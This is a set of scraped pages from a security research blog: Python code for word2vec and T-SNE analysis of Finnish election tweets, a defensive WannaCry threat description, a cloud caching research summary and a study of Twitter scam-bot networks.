Now we’re done with all preprocessing steps, let’s get into the more interesting analysis functions. The following function accepts the tokenized and cleaned data generated from the steps above, and uses it to train a word2vec model. The num_features parameter sets the number of features each word is assigned (and hence the dimensionality of the resulting tensor.) It is recommended to set it between 100 and 1000. Naturally, larger values take more processing power and memory/disk space to handle. I found 200 to be enough, but I normally start with a value of 300 when looking at new datasets. The min_count variable passed to word2vec designates how to trim the vocabulary. For example, if min_count is set to 3, all words that appear in the data set less than 3 times will be discarded from the vocabulary used when training the word2vec model. In the dimensionality reduction step we perform later, large vocabulary sizes cause T-SNE iterations to take a long time. Hence, I tuned min_count to generate a vocabulary of around 10,000 words. Increasing the value of sample, will cause word2vec to randomly omit words with high frequency counts. I decided that I wanted to keep all of those words in my analysis, so it’s set to zero. Increasing epoch_count will cause word2vec to train for more iterations, which will, naturally take longer. Increase this if you have a fast machine or plenty of time on your hands 🙂

def get_word2vec(sentences):
  num_workers = multiprocessing.cpu_count()
  num_features = 200
  epoch_count = 10
  sentence_count = len(sentences)
  w2v_file = os.path.join(save_dir, "word_vectors.w2v")
  word2vec = None
  if os.path.exists(w2v_file):
    print("w2v model loaded from " + w2v_file)
    word2vec = w2v.Word2Vec.load(w2v_file)
  else:
    word2vec = w2v.Word2Vec(sg=1,
                            seed=1,
                            workers=num_workers,
                            size=num_features,
                            min_count=min_frequency_val,
                            window=5,
                            sample=0)

    print("Building vocab...")
    word2vec.build_vocab(sentences)
    print("Word2Vec vocabulary length:", len(word2vec.wv.vocab))
    print("Training...")
    word2vec.train(sentences, total_examples=sentence_count, epochs=epoch_count)
    print("Saving model...")
    word2vec.save(w2v_file)
  return word2vec

Tensorboard has some good tools to visualize word embeddings in the word2vec model we just created. These visualizations can be accessed using the “projector” tab in the interface. Here’s code to create tensorboard embeddings:

def create_embeddings(word2vec):
  all_word_vectors_matrix = word2vec.wv.syn0
  num_words = len(all_word_vectors_matrix)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim = word2vec.wv[vocab[0]].shape[0]
  embedding = np.empty((num_words, dim), dtype=np.float32)
  metadata = ""
  for i, word in enumerate(vocab):
    embedding[i] = word2vec.wv[word]
    metadata += word + "\n"
  metadata_file = os.path.join(save_dir, "metadata.tsv")
  with io.open(metadata_file, "w", encoding="utf-8") as f:
    f.write(metadata)

  tf.reset_default_graph()
  sess = tf.InteractiveSession()
  X = tf.Variable([0.0], name='embedding')
  place = tf.placeholder(tf.float32, shape=embedding.shape)
  set_x = tf.assign(X, place, validate_shape=False)
  sess.run(tf.global_variables_initializer())
  sess.run(set_x, feed_dict={place: embedding})

  summary_writer = tf.summary.FileWriter(save_dir, sess.graph)
  config = projector.ProjectorConfig()
  embedding_conf = config.embeddings.add()
  embedding_conf.tensor_name = 'embedding:0'
  embedding_conf.metadata_path = 'metadata.tsv'
  projector.visualize_embeddings(summary_writer, config)

  save_file = os.path.join(save_dir, "model.ckpt")
  print("Saving session...")
  saver = tf.train.Saver()
  saver.save(sess, save_file)

Once this code has been run, tensorflow log entries will be created in save_dir. To start a tensorboard session, run the following command from the same directory where this script was run from:

tensorboard –logdir=save_dir

You should see output like the following once you’ve run the above command:

TensorBoard 0.4.0rc3 at http://node.local:6006 (Press CTRL+C to quit)

Navigate your web browser to localhost:<port_number> to see the interface. From the “Inactive” pulldown menu, select “Projector”.

tensorboard projector menu item

The “projector” menu is often hiding under the “inactive” pulldown.

Once you’ve selected “projector”, you should see a view like this:

Tensorboard's projector view

Tensorboard’s projector view allows you to interact with word embeddings, search for words, and even run t-sne on the dataset.

There are a lot of things to play around with in this view. You can search for words, fly around the embeddings, and even run t-sne (on the bottom left) on the dataset. If you get to this step, have fun playing with the interface!

And now, back to the code. One of word2vec’s most interesting functions is to find similarities between words. This is done via the word2vec.wv.most_similar() call. The following function calls word2vec.wv.most_similar() for a word and returns num-similar words. The returned value is a list containing the queried word, and a list of similar words. ( [queried_word, [similar_word1, similar_word2, …]] ).

def most_similar(input_word, num_similar):
  sim = word2vec.wv.most_similar(input_word, topn=num_similar)
  output = []
  found = []
  for item in sim:
    w, n = item
    found.append(w)
  output = [input_word, found]
  return output

The following function takes a list of words to be queried, passes them to the above function, saves the output, and also passes the queried words to t_sne_scatterplot(), which we’ll show later. It also writes a csv file – associations.csv – which can be imported into Gephi to generate graphing visualizations. You can see some Gephi-generated visualizations in the accompanying blog post.

I find that manually viewing the word2vec_test.json file generated by this function is a good way to read the list of similarities found for each word queried with wv.most_similar().

def test_word2vec(test_words):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  output = []
  associations = {}
  test_items = test_words
  for count, word in enumerate(test_items):
    if word in vocab:
      print("[" + str(count+1) + "] Testing: " + word)
      if word not in associations:
        associations[word] = []
      similar = most_similar(word, num_similar)
      t_sne_scatterplot(word)
      output.append(similar)
      for s in similar[1]:
        if s not in associations[word]:
          associations[word].append(s)
    else:
      print("Word " + word + " not in vocab")
  filename = os.path.join(save_dir, "word2vec_test.json")
  save_json(output, filename)
  filename = os.path.join(save_dir, "associations.json")
  save_json(associations, filename)
  filename = os.path.join(save_dir, "associations.csv")
  handle = io.open(filename, "w", encoding="utf-8")
  handle.write(u"Source,Target\n")
  for w, sim in associations.iteritems():
    for s in sim:
      handle.write(w + u"," + s + u"\n")
  return output

The next function implements standalone code for creating a scatterplot from the output of T-SNE on a set of data points obtained from a word2vec.wv.most_similar() query. The scatterplot is visualized with matplotlib. Unfortunately, my matplotlib skills leave a lot to be desired, and these graphs don’t look great. But they’re readable.

def t_sne_scatterplot(word):
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  dim0 = word2vec.wv[vocab[0]].shape[0]
  arr = np.empty((0, dim0), dtype='f')
  w_labels = [word]
  nearby = word2vec.wv.similar_by_word(word, topn=num_similar)
  arr = np.append(arr, np.array([word2vec[word]]), axis=0)
  for n in nearby:
    w_vec = word2vec[n[0]]
    w_labels.append(n[0])
    arr = np.append(arr, np.array([w_vec]), axis=0)

  tsne = TSNE(n_components=2, random_state=1)
  np.set_printoptions(suppress=True)
  Y = tsne.fit_transform(arr)
  x_coords = Y[:, 0]
  y_coords = Y[:, 1]

  plt.rc("font", size=16)
  plt.figure(figsize=(16, 12), dpi=80)
  plt.scatter(x_coords[0], y_coords[0], s=800, marker="o", color="blue")
  plt.scatter(x_coords[1:], y_coords[1:], s=200, marker="o", color="red")

  for label, x, y in zip(w_labels, x_coords, y_coords):
    plt.annotate(label.upper(), xy=(x, y), xytext=(0, 0), textcoords='offset points')
  plt.xlim(x_coords.min()-50, x_coords.max()+50)
  plt.ylim(y_coords.min()-50, y_coords.max()+50)
  filename = os.path.join(plot_dir, word + "_tsne.png")
  plt.savefig(filename)
  plt.close()

In order to create a scatterplot of the entire vocabulary, we need to perform T-SNE over that whole dataset. This can be a rather time-consuming operation. The next function performs that operation, attempting to save and re-load intermediate steps (since some of them can take over 30 minutes to complete).

def calculate_t_sne():
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  arr = np.empty((0, dim0), dtype='f')
  labels = []
  vectors_file = os.path.join(save_dir, "vocab_vectors.npy")
  labels_file = os.path.join(save_dir, "labels.json")
  if os.path.exists(vectors_file) and os.path.exists(labels_file):
    print("Loading pre-saved vectors from disk")
    arr = load_bin(vectors_file)
    labels = load_json(labels_file)
  else:
    print("Creating an array of vectors for each word in the vocab")
    for count, word in enumerate(vocab):
      if count % 50 == 0:
        print_progress(count, vocab_len)
      w_vec = word2vec[word]
      labels.append(word)
      arr = np.append(arr, np.array([w_vec]), axis=0)
    save_bin(arr, vectors_file)
    save_json(labels, labels_file)

  x_coords = None
  y_coords = None
  x_c_filename = os.path.join(save_dir, "x_coords.npy")
  y_c_filename = os.path.join(save_dir, "y_coords.npy")
  if os.path.exists(x_c_filename) and os.path.exists(y_c_filename):
    print("Reading pre-calculated coords from disk")
    x_coords = load_bin(x_c_filename)
    y_coords = load_bin(y_c_filename)
  else:
    print("Computing T-SNE for array of length: " + str(len(arr)))
    tsne = TSNE(n_components=2, random_state=1, verbose=1)
    np.set_printoptions(suppress=True)
    Y = tsne.fit_transform(arr)
    x_coords = Y[:, 0]
    y_coords = Y[:, 1]
    print("Saving coords.")
    save_bin(x_coords, x_c_filename)
    save_bin(y_coords, y_c_filename)
 return x_coords, y_coords, labels, arr

The next function takes the data calculated in the above step, and data obtained from test_word2vec(), and plots the results from each word queried on the scatterplot of the entire vocabulary. These plots are useful for visualizing which words are closer to others, and where clusters commonly pop up. This is the last function before we get onto the main routine.

def show_cluster_locations(results, labels, x_coords, y_coords):
  for item in results:
    name = item[0]
    print("Plotting graph for " + name)
    similar = item[1]
    in_set_x = []
    in_set_y = []
    out_set_x = []
    out_set_y = []
    name_x = 0
    name_y = 0
    for count, word in enumerate(labels):
      xc = x_coords[count]
      yc = y_coords[count]
      if word == name:
        name_x = xc
        name_y = yc
      elif word in similar:
        in_set_x.append(xc)
        in_set_y.append(yc)
      else:
        out_set_x.append(xc)
        out_set_y.append(yc)
    plt.figure(figsize=(16, 12), dpi=80)
    plt.scatter(name_x, name_y, s=400, marker="o", c="blue")
    plt.scatter(in_set_x, in_set_y, s=80, marker="o", c="red")
    plt.scatter(out_set_x, out_set_y, s=8, marker=".", c="black")
    filename = os.path.join(big_plot_dir, name + "_tsne.png")
    plt.savefig(filename)
    plt.close()

Now let’s write our main routine, which will call all the above functions, process our collected Twitter data, and generate visualizations. The first few lines take care of our three preprocessing steps, and generation of a frequency distribution / vocabulary. The script expects the raw Twitter data to reside in a relative path (data/tweets.txt). Change those variables as needed. Also, all output is saved to a subdirectory in the relative path (analysis/). Again, tailor this to your needs.

if __name__ == '__main__':
  input_dir = "data"
  save_dir = "analysis"
  if not os.path.exists(save_dir):
    os.makedirs(save_dir)

  print("Preprocessing raw data")
  raw_input_file = os.path.join(input_dir, "tweets.txt")
  filename = os.path.join(save_dir, "data.json")
  processed = try_load_or_process(filename, process_raw_data, raw_input_file)
  print("Unique sentences: " + str(len(processed)))

  print("Tokenizing sentences")
  filename = os.path.join(save_dir, "tokens.json")
  tokens = try_load_or_process(filename, tokenize_sentences, processed)

  print("Cleaning tokens")
  filename = os.path.join(save_dir, "cleaned.json")
  cleaned = try_load_or_process(filename, clean_sentences, tokens)

  print("Getting word frequencies")
  filename = os.path.join(save_dir, "frequencies.json")
  frequencies = try_load_or_process(filename, get_word_frequencies, cleaned)
  vocab_size = len(frequencies)
  print("Unique words: " + str(vocab_size))

Next, I trim the vocabulary, and save the resulting list of words. This allows me to look over the trimmed list and ensure that the words I’m interested in survived the trimming operation. Due to the nature of the Finnish language, (and Twitter), the vocabulary of our “cleaned” set, prior to trimming, was over 100,000 unique words. After trimming it ended up at around 11,000 words.

  trimmed_vocab = []
  min_frequency_val = 6
  for item in frequencies:
    if item[1] >= min_frequency_val:
      trimmed_vocab.append(item[0])
  trimmed_vocab_size = len(trimmed_vocab)
  print("Trimmed vocab length: " + str(trimmed_vocab_size))
  filename = os.path.join(save_dir, "trimmed_vocab.json")
  save_json(trimmed_vocab, filename)

The next few lines do all the compute-intensive work. We’ll create a word2vec model with the cleaned token set, create tensorboard embeddings (for the visualizations mentioned above), and calculate T-SNE. Yes, this part can take a while to run, so go put the kettle on.

  print
  print("Instantiating word2vec model")
  word2vec = get_word2vec(cleaned)
  vocab = word2vec.wv.vocab.keys()
  vocab_len = len(vocab)
  print("word2vec vocab contains " + str(vocab_len) + " items.")
  dim0 = word2vec.wv[vocab[0]].shape[0]
  print("word2vec items have " + str(dim0) + " features.")

  print("Creating tensorboard embeddings")
  create_embeddings(word2vec)

  print("Calculating T-SNE for word2vec model")
  x_coords, y_coords, labels, arr = calculate_t_sne()

Finally, we’ll take the top 50 most frequent words from our frequency distrubution, query them for 40 most similar words, and plot both labelled graphs of each set, and a “big plot” of that set on the entire vocabulary.

  plot_dir = os.path.join(save_dir, "plots")
  if not os.path.exists(plot_dir):
    os.makedirs(plot_dir)

  num_similar = 40
  test_words = []
  for item in frequencies[:50]:
    test_words.append(item[0])
  results = test_word2vec(test_words)

  big_plot_dir = os.path.join(save_dir, "big_plots")
  if not os.path.exists(big_plot_dir):
    os.makedirs(big_plot_dir)
  show_cluster_locations(results, labels, x_coords, y_coords)

And that’s it! Rather a lot of code, but it does quite a few useful tasks. If you’re interested in seeing the visualizations I created using this tool against the Tweets collected from the January 2018 Finnish presidential elections, check out this blog post.



NLP Analysis And Visualizations Of #presidentinvaalit2018

During the lead-up to the January 2018 Finnish presidential elections, I collected a dataset consisting of raw Tweets gathered from search words related to the election. I then performed a series of natural language processing experiments on this raw data. The methodology, including all the code used, can be found in an accompanying blog post. […]

2018-01-30

How To Get Tweets From A Twitter Account Using Python And Tweepy

In this blog post, I’ll explain how to obtain data from a specified Twitter account using tweepy and Python. Let’s jump straight into the code! As usual, we’ll start off by importing dependencies. I’ll use the datetime and Counter modules later on to do some simple analysis tasks. from tweepy import OAuthHandler from tweepy import […]

2018-01-26

How To Get Streaming Data From Twitter

I occasionally receive requests to share my Twitter analysis tools. After a few recent requests, it finally occurred to me that it would make sense to create a series of articles that describe how to use Python and the Twitter API to perform basic analytical tasks. Teach a man to fish, and all that. In […]

2018-01-17

Further Analysis Of The Finnish Themed Twitter Botnet

In a blog post I published yesterday, I detailed the methodology I have been using to discover “Finnish themed” Twitter accounts that are most likely being programmatically created. In my previous post, I called them “bots”, but for the sake of clarity, let’s refer to them as “suspicious accounts”. These suspicious accounts all follow a […]

2018-01-12

Someone Is Building A Finnish-Themed Twitter Botnet

Finland will hold a presidential election on the 28th January 2018. Campaigning just started, and candidates are being regularly interviewed by the press and on the TV. In a recent interview, one of the presidential candidates, Pekka Haavisto, mentioned that both his Twitter account, and the account of the current Finnish president, Sauli Niinistö had […]

2018-01-11

Some Notes On Meltdown And Spectre

The recently disclosed Meltdown and Spectre vulnerabilities can be viewed as privilege escalation attacks that allow an attacker to read data from memory locations that aren’t meant to be accessible. Neither of these vulnerabilities allow for code execution. However, exploits based on these vulnerabilities could allow an adversary to obtain sensitive information from memory (such […]

2018-01-09

Don’t Let An Auto-Elevating Bot Spoil Your Christmas

Ho ho ho! Christmas is coming, and for many people it’s time to do some online shopping. Authors of banking Trojans are well aware of this yearly phenomenon, so it shouldn’t come as a surprise that some of them have been hard at work preparing some nasty surprises for this shopping season. And that’s exactly […]

2017-12-18

Necurs’ Business Is Booming In A New Partnership With Scarab Ransomware

Necurs’ spam botnet business is doing well as it is seemingly acquiring new customers. The Necurs botnet is the biggest deliverer of spam with 5 to 6 million infected hosts online monthly, and is responsible for the biggest single malware spam campaigns. Its service model provides the whole infection chain: from spam emails with malicious […]

2017-11-23

RickRolled by none other than IoTReaper

IoT_Reaper overview IoT_Reaper, or the Reaper in short, is a Linux bot targeting embedded devices like webcams and home router boxes. Reaper is somewhat loosely based on the Mirai source code, but instead of using a set of admin credentials, the Reaper tries to exploit device HTTP control interfaces. It uses a range of vulnerabilities […]

2017-11-03

Facebook Phishing Targeted iOS and Android Users from Germany, Sweden and Finland

Two weeks ago, a co-worker received a message in Facebook Messenger from his friend. Based on the message, it seemed that the sender was telling the recipient that he was part of a video in order to lure him into clicking it. The shortened link was initially redirecting to Youtube.com, but was later on changed […]

2017-10-30
#####EOF##### Malware | News from the Lab
Articles with the Tag

#malware

#####EOF##### F-Secure Labs | Home

Combining knowledge and technology

Learn more

Live detection reports

Last 24 hours

Top 10 detection reports

Last 24 hours

From the Labs

Thoughts and views on the latest technology and security news

 
 
 
 
 
 
 
 
 

Submit A Sample

Send us a file or URL you think is harmful, or incorrectly detected

Submit a Sample

Report a Vulnerability

Take part in our bug bounty program

Submit a Report

Threat Descriptions

Information about recently published detections

Trojan:W32/Rabbad

This crypto-ransomware first came to public notice on 24 October 2017 following reports that it had infected organizations in Ukraine and Russia.

Application.BitCoinMiner.SX

Application.BitCoinMiner is a program that uses the computer's physical resources (memory, processing power, etc) to generate units of a virtual or digital cryptocurrency.

Trojan.PRForm.A

This detection identifies compromised installers for the CCleaner utility program, which have been altered to include a backdoor that silently runs in the background when the affected installer is launched.

Latest Whitepapers

100%x200

The State of Cyber Security 2017

Published Feb 2017

Observations and insights to help users and businesses keep pace with a rapidly evolving threat landscape.

Read more (PDF)

100%x200

Callisto Group

Published Apr 2017

The Callisto Group threat actor's primary interest is gathering foreign and security policy intelligence.

Read more (PDF)

100%x200

Ransomware

How to prevent, predict, detect & respond

Published Apr 2017

Ransomware is one of the most prominent cyber threats today. Yet just like any other threat...

Read more (PDF)

Videos

Lab-related videos on F-Secure's YouTube channels

F-Secure State of Cyber Security 2017 - Beyond the Nation State
F-Secure State of Cyber Security 2017 - The Insecure Home Security System
How Can You Keep Your Data From Your ISP?
#####EOF##### Andy Patel | News from the Lab
About

Andy Patel


Researcher, Artificial Intelligence Center of Excellence.
Twitter: @r0zetta

Latest articles from

Andy Patel

#####EOF##### Video: Creating Graph Visualizations With Gephi | News from the Lab

Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.



Articles with similar Tags
#####EOF##### realtime-spy | News from the Lab
Articles with the Tag

#realtime-spy

#####EOF##### Social Networks | News from the Lab
Articles with the Tag

#social-networks

#####EOF##### surveillance | News from the Lab
Articles with the Tag

#surveillance

#####EOF##### Improving Caching Strategies With SSICLOPS | News from the Lab

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project.

The Scalable and Secure Infrastructures for Cloud Operations (SSICLOPS, pronounced “cyclops”) project focuses on techniques for the management of federated cloud infrastructures, in particular cloud networking techniques within software-defined data centres and across wide-area networks. SSICLOPS is funded by the European Commission under the Horizon2020 programme (https://ssiclops.eu/). The project brings together industrial and academic partners from Finland, Germany, Italy, the Netherlands, Poland, Romania, Switzerland, and the UK.

The primary goal of the SSICLOPS project is to empower enterprises to create and operate high-performance private cloud infrastructure that allows flexible scaling through federation with other clouds without compromising on their service level and security requirements. SSICLOPS federation supports the efficient integration of clouds, no matter if they are geographically collocated or spread out, belong to the same or different administrative entities or jurisdictions: in all cases, SSICLOPS delivers maximum performance for inter-cloud communication, enforce legal and security constraints, and minimize the overall resource consumption. In such a federation, individual enterprises will be able to dynamically scale in/out their cloud services: because they dynamically offer own spare resources (when available) and take in resources from others when needed. This allows maximizing own infrastructure utilization while minimizing excess capacity needs for each federation member.

Many of our systems (both backend and on endpoints) rely on the ability to quickly query the reputation and metadata of objects from a centrally maintained repository. Reputation queries of this type are served either directly from the central repository, or through one of many geographically distributed proxy nodes. When a query is made to a proxy node, if the required verdicts don’t exist in that proxy’s cache, the proxy queries the central repository, and then delivers the result. Since reputation queries need to be low-latency, the additional hop from proxy to central repository slows down response times.

In the scope of the SSICLOPS project, we evaluated a number of potential improvements to this content distribution network. Our aim was to reduce the number of queries from proxy nodes to the central repository, by improving caching mechanisms for use cases where the set of the most frequently accessed items is highly dynamic. We also looked into improving the speed of communications between nodes via protocol adjustments. Most of this work was done in cooperation with Deutsche Telecom and Aalto University.

The original implementation of our proxy nodes used a Least Recently Used (LRU) caching mechanism to determine which cached items should be discarded. Since our reputation verdicts have time-to-live values associated with them, these values were also taken into account in our original algorithm.

Hit Rate Results

Initial tests performed in October 2017 indicated that SG-LRU outperformed LRU on our dataset

During the project, we worked with Gerhard Hasslinger’s team at Deutsch Telecom to evaluate whether alternate caching strategies might improve the performance of our reputation lookup service. We found that Score-Gated LRU / Least Frequently Used (LFU) strategies outperformed our original LRU implementation. Based on the conclusions of this research, we have decided to implement a windowed LFU caching strategy, with some limited “predictive” features for determining which items might be queried in the future. The results look promising, and we’re planning on bringing the new mechanism into our production proxy nodes in the near future.

fraction_of_top_k_results_compared_to_cache_hit_rates

SG-LRU exploits the focus on top-k requests by keeping most top-k objects in the cache

The work done in SSICLOPS will serve as a foundation for the future optimization of content distribution strategies in many of F-Secure’s services, and we’d like to thank everyone who worked with us on this successful project!



#####EOF##### Twitter | News from the Lab
Articles with the Tag

#twitter

#####EOF##### Sami Ruohonen | News from the Lab
About

Sami Ruohonen


Threat Researcher at F-Secure

Latest articles from

Sami Ruohonen

#####EOF##### Eternalblue | News from the Lab
Articles with the Tag

#eternalblue-2

#####EOF##### Trojan.Ransom.WannaCryptor Description | F-Secure Labs

Trojan.Ransom.WannaCryptor

Classification

Malware

Trojan

W32

WCryr,WannaCry.[variant],Wanna Decryptor,Trojan:W32/WannaCry.[variant],Trojan.Ransom.WannaCryptor.[variant],Win32.Trojan-Ransom.WannaCry.[variant],Trojan:W32/WannaCryptor.[variant]!Deepguard

Summary

Trojan.Ransom.WannaCryptor identifies the WannaCry ransomware, which encrypts the affected device and demands payment of a ransom to restore normal use.

WannaCry is also known as Wanna Decryptor and WCryr.

Detections

F-Secure security products detect all known variants of this threat with a combination of generic detections and family-specific detections, including (but not limited to):

  • Trojan.Ransom.WannaCryptor.H
  • Trojan:W32/WannaCryptor.A!Deepguard
  • Gen:Variant.Ransom.WannaCryptor.1
  • Gen:Trojan.Heur.RP.JtW@aePsbmpi
  • Suspicious:W32/Malware.51e4307093!Online

Please ensure your F-Secure security product is up-to-date with the latest detection database updates and has Deepguard turned on for maximum coverage.

Removal

Automatic action

Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it.

Exploit prevention

The WannaCry ransomware attack uses known vulnerabilities in the Windows operating system to spread and infect machines. Microsoft has already released a fix for this issue in its March 2017 Security Bulletin. It is strongly recommended that users and administrators ensure that all their systems have received the patch:

Users on systems using versions such as Windows XP that no longer have mainstream support should refer to Microsoft's blogpost offering more details of emergency security patches they have released in response to this issue:

Find out more

Knowledge Base

Find the latest advice in our Community Knowledge Base.

User Guide

See the user guide for your product on the Help Center.

Contact Support

Chat with or call an expert for help.

Submit a sample

Submit a file or URL for further analysis.

Technical Details

WannaCry came to public notice in a major outbreak that was first reported on Friday, 13 May 2017:

For more information about this incident, see:

Infection

The WannaCry ransomware is spread by a dropper component that exploits known vulnerabilities in Windows to drop the ransomware binary onto a vulnerable machine. If the dropper is successful in exploiting an Internet-facing machine, it can also use vulnerabilities in Windows SMB Server to infect other computers on the same local area network.

As part of its attack, the WannaCry dropper component uses an exploit known as EternalBlue, which was first publicized in the data allegedly stolen from the US's National Security Agency (NSA) and released by hacking group The Shadow Brokers.

The vulnerabilities used to spread WannaCry have already been fixed by Microsoft in March 2017 with the MS17-010 patch; systems that have not yet received the fix however remain vulnerable. It is strongly recommended that users and administrators ensure that all their systems have received the MS17-010 patch to prevent the WannaCry ransomware from gaining entry to their machines.

Encryption

The WannaCry ransomware encrypts all files stored on the affected machine. The encryption uses the AES 128-bit encryption algorithms, which are extremely difficult to break.

It encrypts the following file types: .doc, .docx, .docb, .docm, .dot, .dotm, .dotx, .xls, .xlsx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .ppt, .pptx, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .pst, .ost, .msg, .eml, .edb, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .jpeg, .jpg, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

Ransom demand

Once the files have been encrypted, WannaCry displays a ransom demand for up to $300 in Bitcoin. A video and screenshots of the ransomware in action can be seen in the following post on F-Secure's Safe and Savvy blog:

Date Created: 13-May-2017 02:00:00 UTC

Date Last Modified: 15-May-2017 02:20:00 UTC

#####EOF##### Cyber security and online security articles, news and research - F-Secure Blog Skip to content

Trending tags

Trending Themes

Data Breaches 101

What are data breaches? What to do if your account has been involved in one? These articles answer those questions and more.

Making Attackers Unhappy Since 1988

The history of F-Secure is the history of our fellows, and here we are.

Cyber Security Crash Course

Get a quick overview to incident detection and response. Increase your organization’s security awareness with the video series.

Newsletter modal

Thank you for your interest towards F-Secure newsletter. You will shortly get an email to confirm the subscription.

Gated Content modal

Congratulations – You can now access the content by clicking the button below.

#####EOF##### Pr0nbots2: Revenge Of The Pr0nbots | News from the Lab

Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally.

To start with, let’s recap. In my previous research, I used a script to recursively query Twitter accounts for specific patterns, and found just over 22,000 Twitter bots using this process. This figure was based on the fact that I concluded my research (stopped my script) after querying only 3000 of the 22,000 discovered accounts. I have a suspicion that my script would have uncovered a lot more accounts, had I let it run longer.

This week, I decided to re-query all the Twitter IDs I found in March, to see if anything had changed. To my surprise, I was only able to query 2895 of the original 21964 accounts, indicating that Twitter has taken action on most of those accounts.

In order to find out whether the culled accounts were deleted or suspended, I wrote a small python script that utilized the requests module to directly query each account’s URL. If the script encountered a 404 error, it indicated that the account was removed or renamed. A reply indicated that the account was suspended. Of the 19069 culled accounts checked, 18932 were suspended, and 137 were deleted/renamed.

I also checked the surviving accounts in a similar manner, using requests to identify which ones were “restricted” (by checking for specific strings in the html returned from the query). Of the 2895 surviving accounts, 47 were set to restricted and the other 2848 were not.

As noted in my previous article, the accounts identified during my research had creation dates ranging from a few days old to over a decade in age. I checked the creation dates of both the culled set and the survivor’s set (using my previously recorded data) for patterns, but I couldn’t find any. Here they are, for reference:

Based on the connectivity I recorded between the original bot accounts, I’ve created a new graph visualization depicting the surviving communities. Of the 2895 survivors, only 402 presumably still belong to the communities I observed back then. The rest of the accounts were likely orphaned. Here’s a representation of what the surviving communities might look like, if the entity controlling these accounts didn’t make any changes in the meantime.

By the way, I’m using Gephi to create these graph visualizations, in case you were wondering.

Erik Ellason (@slickrockweb) contacted me recently with some evidence that the bots I’d discovered might be re-tooling. He pointed me to a handful of accounts that contained the shortened URL in a pinned tweet (instead of in the account’s description). Here’s an example profile:

Fetching a user object using the Twitter API will also return the last tweet that account published, but I’m not sure it would necessarily return the pinned Tweet. In fact, I don’t think there’s a way of identifying a pinned Tweet using the standard API. Hence, searching for these accounts by their promotional URL would be time consuming and problematic (you’d have to iterate through their tweets).

Fortunately, automating discovery of Twitter profiles similar to those Eric showed me was fairly straightforward. Like the previous botnet, the accounts could be crawled due to the fact that they follow each other. Also, all of these new accounts had text in their descriptions that followed a predictable pattern. Here’s an example of a few of those sentences:

look url in last post
go on link in top tweet
go at site in last post

It was trivial to construct a simple regular expression to find all such sentences:

desc_regex = "(look|go on|go at|see|check|click) (url|link|site) in (top|last) (tweet|post)"

I modified my previous script to include the above regular expression, seeded it with the handful of accounts that Eric had provided me, and let it run. After 24 hours, my new script had identified just over 20000 accounts. Mapping the follower/following relationships between these accounts gave me the following graph:

As we zoom in, you’ll notice that these accounts are way more connected than the older botnet. The 20,000 or so accounts identified at this point map to just over 100 separate communities. With roughly the same amount of accounts, the previous botnet contained over 1000 communities.

Zooming in further shows the presence of “hubs” in each community, similar to in our previous botnet.

Given that this botnet showed a greater degree of connectivity than the previous one studied, I decided to continue my discovery script and collect more data. The discovery rate of new accounts slowed slightly after the first 24 hours, but remained steady for the rest of the time it was running. After 4 days, my script had found close to 44,000 accounts.

And eight days later, the total was just over 80,000.

Here’s another way of visualizing that data:


Here’s the size distribution of communities detected for the 80,000 node graph. Smaller community sizes may indicate places where my discovery script didn’t yet look. The largest communities contained over 1000 accounts. There may be a way of searching more efficiently for these accounts by prioritizing crawling within smaller communities, but this is something I’ve yet to explore.

I shut down my discovery script at this point, having queried just over 30,000 accounts. I’m fairly confident this rabbit hole goes a lot deeper, but it would have taken weeks to query the next 50,000 accounts, not to mention the countless more that would have been added to the list during that time.

As with the previous botnet, the creation dates of these accounts spanned over a decade.

Here’s the oldest account I found.

Using the same methodology I used to analyze the survivor accounts from the old botnet, I checked which of these new accounts were restricted by Twitter. There was an almost exactly even split between restricted and non-restricted accounts in this new set.

Given that these new bots show many similarities to the previously discovered botnet (similar avatar pictures, same URL shortening services, similar usage of the English language) we might speculate that this new set of accounts is being managed by the same entity as those older ones. If this is the case, a further hypothesis is that said entity is re-tooling based on Twitter’s action against their previous botnet (for instance, to evade automation).

Because these new accounts use a pinned Tweet to advertise their services, we can test this hypothesis by examining the creation dates of the most recent Tweet from each account. If the entity is indeed re-tooling, all of the accounts should have Tweeted fairly recently. However, a brief examination of last tweet dates for these accounts revealed a rather large distribution, tracing back as far as 2012. The distribution had a long tail, with a majority of the most recent Tweets having been published within the last year. Here’s the last year’s worth of data graphed.

